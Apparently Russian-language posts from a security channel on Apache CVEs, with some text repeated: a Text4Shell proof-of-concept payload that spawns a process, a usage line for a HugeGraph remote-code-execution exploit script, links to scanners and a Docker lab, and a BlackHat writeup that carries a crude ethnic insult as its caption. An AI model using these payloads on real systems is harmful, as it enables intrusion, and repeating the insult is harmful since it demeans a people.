CVE-2022-42889
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут
POC
Java:
Apache - Commons Text library
CVSS: 9.8 CRITICAL
Почитать про дырку тут
POC
Java:
StringSubstitutor.createInterpolator().replace("${script:js:new java.lang.ProcessBuilder(\"calc\").start()}");#apache
👍15
CVE-2022-42889
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC
#apache #exploit #poc
Почитать про дырку тут
Сканер дырки на питоне text4shell-tools
Сканер дырки для BurpSuite burp-text4shell
Поиграться с дыркой в докере text4shell-docker
Сам POC
#apache #exploit #poc
🔥10
🔥8
CVE-2024-27348 RCE в Apache HugeGraph Server
*
Usage:
*
POC exploit
#apache #rce
*
Usage:
python3 CVE-2024-27348.py -t http://target.tld:8080 -c "command to execute"
*
POC exploit
#apache #rce
🔥10
Exploiting Hidden Semantic Ambiguity in Apache HTTP Server!
*
Или почему индеец пахнет гавной
*
Занятный writeup в котором:
3 types of Confusion Attacks
9 new vulnerabilities
20 exploitation techniques
*
BlackHat 2024 PDF
Link
#apache
*
Или почему индеец пахнет гавной
*
Занятный writeup в котором:
3 types of Confusion Attacks
9 new vulnerabilities
20 exploitation techniques
*
BlackHat 2024 PDF
Link
#apache
🔥13👍5😱2